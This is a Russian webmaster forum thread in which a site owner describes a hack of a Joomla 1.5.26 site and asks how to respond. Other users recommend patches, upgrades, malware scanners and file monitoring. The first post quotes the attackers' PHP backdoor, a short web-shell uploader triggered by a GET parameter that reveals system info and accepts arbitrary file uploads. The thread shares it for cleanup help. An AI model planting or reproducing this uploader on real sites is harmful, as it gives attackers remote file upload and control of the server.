Взлом сайта на Joomla

ES
На сайте с 07.10.2008
Offline
99
4865

Вобщем позавчера получили от хостера письмо претензию. Письмо - пересылка хостера претензии от дата центра. Вобщем в претензии указывалось на некий текстовой файл в каталоге одного из сайтов

Содержание текстового файла

hacked by НИК первого хакера and НИК второго хакера

Попутно был обнаружен пустой php файл, который находился с каталоге www, последний корневой каталок папок с сайтами. Такой же файл находился в в корневом каталоге одного из сайтов, рядом с текстовым файлом, про который писалось выше. Второй php файл не был пустым и содержал такой код

<?php if(isset($_GET["howwm"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>

Вобщем файлы были удалены, в логах найден ip взломщика, были проведены некоторые действия по защите Joomla.

Сегодня в папке тогоже сайта был найден новый php файл (смотрим вложения)

По вчерашним логам IP взломщика было видно обращения к php файлу а также к одному из установленных модулей, а точнее к конфигурационному файлу. По сегодняшним логам IP взломщика взломщика видно обращение к файлу a.php больше никаких обращений. Один момент - было обращение ко вчерашним файлам, которые были удалены. Из логов видно что IP ротируются.

Теперь вопросы. Вопросы банальны - откуда копать, откуда могли взломать, что делать.

Версия Joomla 1.5.26

zip a.zip
Я
Chalk
На сайте с 05.11.2009
Offline
48
#1

Что делать, что делать.. На другую CMS переезжать. У товарища тоже, что не Джумла, то взлом раз в месяц. Юзайте Друпал - ни одного взлома за 5 лет

K5
На сайте с 21.07.2010
Offline
209
#2

проверьте ай-болитом для начала

модули/плагины обновлены?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
ES
На сайте с 07.10.2008
Offline
99
#3

Проблемма в том что модули плагины из паблика. Версии актуальные.

PS у меня была инструкция как средствами .htaccess блокировать (или вести журнал) при обращении к определенному файлу. Возможно у кого нибудь есть интрукция, как средствами .htaccess блокировать выполнение php файлов кроме файлов, к примеру index.php

Или как вариант запрет на создание любых новых php/js файлов в определенной дирректории, или глобально во всех папках указанного сайта.

Или любая другая информация о защите через .htaccess

Спасибо.

PS переход с Joomla на другой... ну в моем случае это просто закрыть сайт.

draff
На сайте с 30.03.2010
Offline
65
#4

Еще и патч безопасности есть на Joomla 1.5.26

http://joomlaportal.ru/content/view/2364/57/

Регистрация пользователей разрешена на сайте ?

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
D
На сайте с 28.06.2008
Offline
1114
#5

Вот это поставьте http://santivi.com/ - бесплатно следит кто, что и когда изменено + уведомление на почту

ES
На сайте с 07.10.2008
Offline
99
#6
draff:
Регистрация пользователей разрешена на сайте ?

Да, конечно. Там форум, социальная сеть

draff
На сайте с 30.03.2010
Offline
65
#7

компонент,редактор JCE , nnframework ?

AI
На сайте с 05.05.2013
Offline
114
#8

лучше бы обновились на последнюю версию джумлы из второй или третьей ветки.

ветку 1.x использовать уже смысла нет (прям чувствовал что 1,5 версия у вас)

Регистрирую домены тут (https://order.triplix.ru/pl.php?1)!
ES
На сайте с 07.10.2008
Offline
99
#9

Уже бы давно обновились бы, но разработчики шалона не обновили его до трешки. Адаптация проблемма - фирменый фрейморк переписывать с нуля дороговато будет.

Сделали все рекомендации, пока полет нормальный (как бы не сглазить). Санти антивирус вообще находка - пасет файловую систему.

PS страшновато запускать с сервера файл в аттаче, интересно что за сценарий он выполняет.

Nobody4all
На сайте с 20.09.2013
Offline
18
#10
Eva_Smith:

PS страшновато запускать с сервера файл в аттаче, интересно что за сценарий он выполняет.

http://forum.antichat.net/thread103155.html

Массовая проверка сайтов на АГС (программа) (/ru/forum/857401) Здесь платят от 3 руб. за ссылку, отличная раскупаемость, добавь сайт и попробуй систему (http://goo.gl/QNXTgA).

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий